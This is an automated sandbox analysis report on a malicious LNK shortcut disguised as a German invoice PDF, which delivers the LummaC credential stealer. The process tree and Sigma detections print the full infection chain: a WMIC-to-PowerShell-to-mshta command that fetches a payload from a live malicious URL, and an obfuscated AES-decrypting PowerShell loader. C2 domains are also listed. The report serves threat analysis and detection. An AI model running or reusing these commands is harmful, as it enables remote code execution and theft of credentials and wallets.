Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Rechnung736258.pdf.lnk

Overview

General Information

Sample name:Rechnung736258.pdf.lnk
Analysis ID:1579308
MD5:5bfe0ada17542af48b71b2bd2861b738
SHA1:2a4a858db4aff6ba8d9da7b104cec8e45fb426a8
SHA256:021feed3c450c435bdbd4167f81f4917fcecf38e1836e9bff3c32e0063f3baf5
Tags:dimitricostruzioni-chlnkuser-smica83
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected AntiVM3
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to create processes via WMI
Creates processes via WMI
Drops PE files to the user root directory
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects code into the Windows Explorer (explorer.exe)
LummaC encrypted strings found
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Created Via Wmic.EXE
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara detected Keylogger Generic

Classification

Process Tree

  • System is w10x64
  • WMIC.exe (PID: 2668 cmdline: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie" MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
    • conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4592 cmdline: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mshta.exe (PID: 5832 cmdline: "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 3396 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0A23752FE985FC9FD64BB3465A7D797346AC4EB8E6FA6258E6C499D05779F61BCEC012DC00DA9FBBDBA937EA0E7F819DA30D6226959EA7519380176563334C188B79BB6DA507B41F9479C4ECD6FCFBEAC89945BB235377DAFFC2B2E0422A373DF64E2DDF535FA76F2F6195EDE596B0317D4804786027E0B623BF5D1D584D6065AFA5E42CE963A4614903389786638A13BFEAD5BCA6D5632E96589B3891210B8EE6577C079CDE437E55F527D851A6E360A415EC287B6A355E4474FF7AFFC5E1C2C84DF35ED4839335D434B4C6EB3E0E9BE4C9BB60244693023805DB66378A17C37A948E7A51FC5D87A0BC7A2EB7D9F4DA156623A9183F872D54778974ADE95F381DE2AAE416E6172BAAEF2320C24A65879A0D52DAD6FAF25F6401BA3456E99B3F0C534868BB75527DBE10715FC36A8BB44C9977366FA95D0EE4ADCEA23B71915BE1B53B87D12D50B68707404AEFB59E47D774511900EB4509210E15424197DEDADBF6270B4BBDB7CA28491995A87F9A3CB9FC232BFB8DD6FC010D911FB9A85D8D423DDB3D610F88D031C25B6AAAA7F6F7E86773457EBF9E1627E87A801B0A5F69AB28A75F7A7684E8E08FBD622656F168B01419A0F9142A0B1E96F0A4019AC5AE6015EC400D4957D3658DA911E88F29E506EE2B315649007D4AD02B9AC42C6536DF21C03BA8A4513A3E4C547246C363F281F230A226EA7FEAF52932752BB3E5AC1DC92E54264FDEEC820E460FF5BF265D1D5A1A7357FCC07BBCB15D0DFC7AFB18D7D8ED8D11813ABE2565BCF731F20AB1D1A8D393D9E8CCA5D1AC1297CE33468EA8FEA4B579AC4DBD4338C86D8207ED1485FEA355E9CE074FCF496ED4D2CEAAFFBF6FE7CD314D30A0CF1CA039AA1EDC0440C8C082BBC07A3458CB8039EB599B8C59B1EEAE0186F371C0B858E495C81E310381A10B00AA941D672D8F0FDD94D6BCF6344EA8D3CF3BE07A0F29AD3BC172F5FEC0541A77B8007A0BA0BA5CD14298C1D74F200A847C8A8586EDAF36D5C8040A3D244982700F4E595857B0619867A217F8FEEAE91B337EF244871580E0CEC7EC35A6E5C5356234C447A13CF21B5B3DCAF3D5A547E32FB972AE6DDFDA3C0C7198771CA4D327A77575F82B079A6BCE811999F9AA1DBCBBA2938F34BE32EADA581AB69F8BC451713EC828E6D3D62F721EB09FC154CB3D93C7D958C9F426B244650B32A5CDBBF9F9512F07496C1DA9AED38876CC794D2073594342E5E9B7E851A0C3AE91198802506F7FE48D8430BC5E4C06506680E3D7613B81E01A16CFD524741269AADD19A2E1CF4A2BA75CF3B27D0B2A2C19729DEF1BAA021F00A33B6CBCB211F0D14BB0D6FDB116AC0D76B7EB14848CA0F71871993F73D63256F5FA94A2FAC681186693CF2F3776C5B0D8C1FD35E87EF9FD6CC7633C06DD2ECB5AE82A9FDCE2BB6DA99DB57E009DCDE40871998B8FDCCD59411335EB4B916E81193A27706177634DA7F7994FB1DD6A944AC9DAECDCA2D45C883E465AC6BC3613FFFE963C92F84B60C9183D522E49857344D0E0171A1B4AF1FBF07286E4C23EC443EFA2CAAB4BEBF411FBE1E4799292B05548811AD68EC505467241E859FA3DD71727E100C7C6F8664659725043526B66756D7661597247';function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • Acrobat.exe (PID: 4460 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\KlarnaInvoice42611.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
            • AcroCEF.exe (PID: 7256 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
              • AcroCEF.exe (PID: 7412 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1752,i,8685861103174925006,15707268363344924565,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • TCUINOVJ.exe (PID: 6360 cmdline: "C:\Users\user\AppData\Roaming\TCUINOVJ.exe" MD5: 38F517307990F8B2F9CEB8DE5BD1A528)
            • iScrPaint.exe (PID: 5880 cmdline: "C:\Users\user\iScrPaint.exe" MD5: 098AC4621EE0E855E0710710736C2955)
              • iScrPaint.exe (PID: 6364 cmdline: C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exe MD5: 098AC4621EE0E855E0710710736C2955)
                • cmd.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                  • conhost.exe (PID: 5796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • explorer.exe (PID: 940 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
  • svchost.exe (PID: 2888 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat", "rapeflowwj.lat", "discokeyus.lat", "energyaffai.lat", "securesways.click", "grannyejh.lat", "necklacebudi.lat"], "Build id": "AB15g1--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Roaming\BackupPatch\iScrPaint.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        C:\Users\user\iScrPaint.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000015.00000003.2738358264.0000000003115000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000015.00000003.2632949061.00000000030BD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000010.00000000.2259726588.0000000000401000.00000020.00000001.01000000.00000010.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                00000015.00000003.2633160316.00000000030BD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0000000F.00000003.2256610867.00000000026E6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    Click to see the 6 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    16.0.iScrPaint.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Potentially Suspicious PowerShell Child Processes
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie, CommandLine: "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4592, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\mshta.exe" https://dimitricostruzioni.ch/documentcomplie, ProcessId: 5832, ProcessName: mshta.exe
                      Sigma detected: Suspicious MSHTA Child Process
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0A23752FE985FC9FD64BB3465A7D797346AC4EB8E6FA6258E6C499D05779F61BCEC012DC00DA9FBBDBA937EA0E7F819DA30D6226959EA7519380176563334C188B79BB6DA507B41F9479C4ECD6FCFBEAC89945BB235377DAFFC2B2E0422A373DF64E2DDF535FA76F2F6195EDE596B0317D4804786027E0B623BF5D1D584D6065AFA5E42CE963A4614903389786638A13BFEAD5BCA6D5632E96589B3891210B8EE6577C079CDE437E55F527D851A6E360A415EC287B6A355E4474FF7AFFC5E1C2C84DF35ED4839335D434B4C6EB3E0E9BE4C9BB60244693023805DB66378A17C37A948E7A51FC5D87A0BC7A2EB7D9F4DA156623A9183F872D54778974ADE95F381DE2AAE416E6172BAAEF2320C24A65879A0D52DAD6FAF25F6401BA3456E99B3F0C534868BB75527DBE10715FC36A8BB44C9977366FA95D0EE4ADCEA23B71915BE1B53B87D12D50B68707404AEFB59E47D774511900EB4509210E15424197DEDADBF6270B4BBDB7CA28491995A87F9A3CB9FC232BFB8DD6FC010D911FB9A85D8D423DDB3D610F88D031C25B6AAAA7F6F7E86773457EBF9E1627E87A801B0A5F69AB28A75F7A7684E8E08FBD622656F168B01419A0F9142A0B1E96F0A4019AC5AE6015EC400D4957D3658DA911E88F29E506EE2B315649007D4AD02B9AC42C6536DF21C03BA8A4513A3E4C547246C363F281F230A226EA7FEAF52932752BB3E5AC1DC92E54264FDEEC820E460FF5BF265D1D5A1A7357FCC07BBCB15D0DFC7AFB18D7D8ED8D11813ABE2565BCF731F20AB1D1A8D393D9E8CCA5D1AC1297CE33468EA8FEA4B579AC4DBD4338C86D8207ED1485FEA355E9CE074FCF496ED4D2CEAAFFBF6FE7CD314D30A0CF1CA039AA1EDC0440C8C082BBC07A3458CB8039EB599B8C59B1EEAE0186F371C0B858E495C81E310381A10B00AA941D672D8F0FDD94D6BCF6344EA8D3CF3BE07A0F29AD3BC172F5FEC0541A77B8007A0BA0BA5CD14298C1D74F200A847C8A8586EDAF36D5C8040A3D244982700F4E595857B0619867A217F8FEEAE91B337EF244871580E0CEC7EC35A6E5C5356234C447A13CF21B5B3DCAF3D5A547E32FB972AE6DDFDA3C0C7198771CA4D327A77575F82B079A6BCE811999F9AA1DBCBBA2938F34BE32EADA581AB69F8BC451713EC828E6D3D62F721EB09FC154CB3D93C7D958C9F426B244650B32A5CDBBF9F9512F07496C1DA9AED38876CC794D2073594342E5E9B7E851A0C3AE91198802506F7FE48D8430BC5E4C06506680E3D7613B81E01A16CFD524741269AADD19A2E1CF4A2BA75CF3B27D0B2A2C19729DEF1BAA021F00A33B6CBCB211F0D14BB0D6FDB116AC0D76B7EB14848CA0F71871993F73D63256F5FA94A2FAC681186693CF2F3776C5B0D8C1FD35E87EF9FD6CC7633C06DD2ECB5AE82A9FDCE2BB6DA99DB57E009DCDE40871998B8FDCCD59411335EB4B916E81193A27706177634DA7F7994FB1DD6A944AC9DAECDCA2D45C883E465AC6BC3613FFFE963C92F84B60C9183D522E49857344D0E0171A1B4AF1FBF07286E4C23EC443EFA2CAAB4BEBF411FBE1E4799292B05548811AD68EC505467241E859FA3DD71727E100C7C6F8664659725043526B66756D7661597247';function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0
                      Sigma detected: Suspicious Process Created Via Wmic.EXE
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie", CommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie", ProcessId: 2668, ProcessName: WMIC.exe
                      Sigma detected: Change PowerShell Policies to an Insecure Level
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0A23752FE985FC9FD64BB3465A7D797346AC4EB8E6FA6258E6C499D05779F61BCEC012DC00DA9FBBDBA937EA0E7F819DA30D6226959EA7519380176563334C188B79BB6DA507B41F9479C4ECD6FCFBEAC89945BB235377DAFFC2B2E0422A373DF64E2DDF535FA76F2F6195EDE596B0317D4804786027E0B623BF5D1D584D6065AFA5E42CE963A4614903389786638A13BFEAD5BCA6D5632E96589B3891210B8EE6577C079CDE437E55F527D851A6E360A415EC287B6A355E4474FF7AFFC5E1C2C84DF35ED4839335D434B4C6EB3E0E9BE4C9BB60244693023805DB66378A17C37A948E7A51FC5D87A0BC7A2EB7D9F4DA156623A9183F872D54778974ADE95F381DE2AAE416E6172BAAEF2320C24A65879A0D52DAD6FAF25F6401BA3456E99B3F0C534868BB75527DBE10715FC36A8BB44C9977366FA95D0EE4ADCEA23B71915BE1B53B87D12D50B68707404AEFB59E47D774511900EB4509210E15424197DEDADBF6270B4BBDB7CA28491995A87F9A3CB9FC232BFB8DD6FC010D911FB9A85D8D423DDB3D610F88D031C25B6AAAA7F6F7E86773457EBF9E1627E87A801B0A5F69AB28A75F7A7684E8E08FBD622656F168B01419A0F9142A0B1E96F0A4019AC5AE6015EC400D4957D3658DA911E88F29E506EE2B315649007D4AD02B9AC42C6536DF21C03BA8A4513A3E4C547246C363F281F230A226EA7FEAF52932752BB3E5AC1DC92E54264FDEEC820E460FF5BF265D1D5A1A7357FCC07BBCB15D0DFC7AFB18D7D8ED8D11813ABE2565BCF731F20AB1D1A8D393D9E8CCA5D1AC1297CE33468EA8FEA4B579AC4DBD4338C86D8207ED1485FEA355E9CE074FCF496ED4D2CEAAFFBF6FE7CD314D30A0CF1CA039AA1EDC0440C8C082BBC07A3458CB8039EB599B8C59B1EEAE0186F371C0B858E495C81E310381A10B00AA941D672D8F0FDD94D6BCF6344EA8D3CF3BE07A0F29AD3BC172F5FEC0541A77B8007A0BA0BA5CD14298C1D74F200A847C8A8586EDAF36D5C8040A3D244982700F4E595857B0619867A217F8FEEAE91B337EF244871580E0CEC7EC35A6E5C5356234C447A13CF21B5B3DCAF3D5A547E32FB972AE6DDFDA3C0C7198771CA4D327A77575F82B079A6BCE811999F9AA1DBCBBA2938F34BE32EADA581AB69F8BC451713EC828E6D3D62F721EB09FC154CB3D93C7D958C9F426B244650B32A5CDBBF9F9512F07496C1DA9AED38876CC794D2073594342E5E9B7E851A0C3AE91198802506F7FE48D8430BC5E4C06506680E3D7613B81E01A16CFD524741269AADD19A2E1CF4A2BA75CF3B27D0B2A2C19729DEF1BAA021F00A33B6CBCB211F0D14BB0D6FDB116AC0D76B7EB14848CA0F71871993F73D63256F5FA94A2FAC681186693CF2F3776C5B0D8C1FD35E87EF9FD6CC7633C06DD2ECB5AE82A9FDCE2BB6DA99DB57E009DCDE40871998B8FDCCD59411335EB4B916E81193A27706177634DA7F7994FB1DD6A944AC9DAECDCA2D45C883E465AC6BC3613FFFE963C92F84B60C9183D522E49857344D0E0171A1B4AF1FBF07286E4C23EC443EFA2CAAB4BEBF411FBE1E4799292B05548811AD68EC505467241E859FA3DD71727E100C7C6F8664659725043526B66756D7661597247';function vyt ($fFWwZ){return -split ($fFWwZ -replace '..', '0x$& ')};$dHSPoMnm = vyt($ddg.SubString(0, 2304));$pzg = [System.Security.Cryptography.Aes]::Create();$pzg.Key = vyt($ddg.SubString(2304));$pzg.IV = New-Object byte[] 16;$dSnUqar = $pzg.CreateDecryptor();$vwahlx = [System.String]::new($dSnUqar.TransformFinalBlock($dHSPoMnm, 0,$dHSPoMnm.Length)); sal fd $vwahlx.Substring(3,3); fd $vwahlx.Substring(6), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ddg = '0A4F04B664291D3C891EE57CF9AA6E0
                      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3396, TargetFilename: C:\Users\user\AppData\Roaming\TCUINOVJ.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie, CommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\Wbem\wmic.exe" process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie", ParentImage: C:\Windows\System32\wbem\WMIC.exe, ParentProcessId: 2668, ParentProcessName: WMIC.exe, ProcessCommandLine: powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie, ProcessId: 4592, ProcessName: powershell.exe
                      Sigma detected: Proxy Execution Via Explorer.exe
                      Source: Process startedAuthor: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative: Data: Command: C:\Windows\SysWOW64\explorer.exe, CommandLine: C:\Windows\SysWOW64\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\explorer.exe, NewProcessName: C:\Windows\SysWOW64\explorer.exe, OriginalFileName: C:\Windows\SysWOW64\explorer.exe, ParentCommandLine: C:\Windows\SysWOW64\cmd.exe, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6552, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\explorer.exe, ProcessId: 940, ProcessName: explorer.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2888, ProcessName: svchost.exe

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-21T14:59:54.022416+010020283713Unknown Traffic192.168.2.549803104.21.16.1443TCP
                      2024-12-21T14:59:58.175252+010020283713Unknown Traffic192.168.2.549815104.21.16.1443TCP
                      2024-12-21T15:00:00.799468+010020283713Unknown Traffic192.168.2.549821104.21.16.1443TCP
                      2024-12-21T15:00:03.593870+010020283713Unknown Traffic192.168.2.549832104.21.16.1443TCP
                      2024-12-21T15:00:06.068835+010020283713Unknown Traffic192.168.2.549838104.21.16.1443TCP
                      2024-12-21T15:00:11.085708+010020283713Unknown Traffic192.168.2.549849104.21.16.1443TCP
                      2024-12-21T15:00:13.970949+010020283713Unknown Traffic192.168.2.549855104.21.16.1443TCP
                      2024-12-21T15:00:18.946471+010020283713Unknown Traffic192.168.2.549871104.21.16.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-21T14:59:56.939866+010020546531A Network Trojan was detected192.168.2.549803104.21.16.1443TCP
                      2024-12-21T14:59:59.025544+010020546531A Network Trojan was detected192.168.2.549815104.21.16.1443TCP
                      2024-12-21T15:00:19.811654+010020546531A Network Trojan was detected192.168.2.549871104.21.16.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-21T14:59:56.939866+010020498361A Network Trojan was detected192.168.2.549803104.21.16.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-21T14:59:59.025544+010020498121A Network Trojan was detected192.168.2.549815104.21.16.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-21T14:59:54.022416+010020583091Domain Observed Used for C2 Detected192.168.2.549803104.21.16.1443TCP
                      2024-12-21T14:59:58.175252+010020583091Domain Observed Used for C2 Detected192.168.2.549815104.21.16.1443TCP
                      2024-12-21T15:00:00.799468+010020583091Domain Observed Used for C2 Detected192.168.2.549821104.21.16.1443TCP
                      2024-12-21T15:00:03.593870+010020583091Domain Observed Used for C2 Detected192.168.2.549832104.21.16.1443TCP
                      2024-12-21T15:00:06.068835+010020583091Domain Observed Used for C2 Detected192.168.2.549838104.21.16.1443TCP
                      2024-12-21T15:00:11.085708+010020583091Domain Observed Used for C2 Detected192.168.2.549849104.21.16.1443TCP
                      2024-12-21T15:00:13.970949+010020583091Domain Observed Used for C2 Detected192.168.2.549855104.21.16.1443TCP
                      2024-12-21T15:00:18.946471+010020583091Domain Observed Used for C2 Detected192.168.2.549871104.21.16.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-21T14:59:52.458854+010020583081Domain Observed Used for C2 Detected192.168.2.5552951.1.1.153UDP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-21T15:00:12.280466+010020480941Malware Command and Control Activity Detected192.168.2.549849104.21.16.1443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-21T14:59:11.549244+010028033053Unknown Traffic192.168.2.54971062.182.21.105443TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 21.2.explorer.exe.9a0000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["crosshuaht.lat", "aspecteirs.lat", "sustainskelet.lat", "rapeflowwj.lat", "discokeyus.lat", "energyaffai.lat", "securesways.click", "grannyejh.lat", "necklacebudi.lat"], "Build id": "AB15g1--"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\documentcomplie[1]ReversingLabs: Detection: 34%
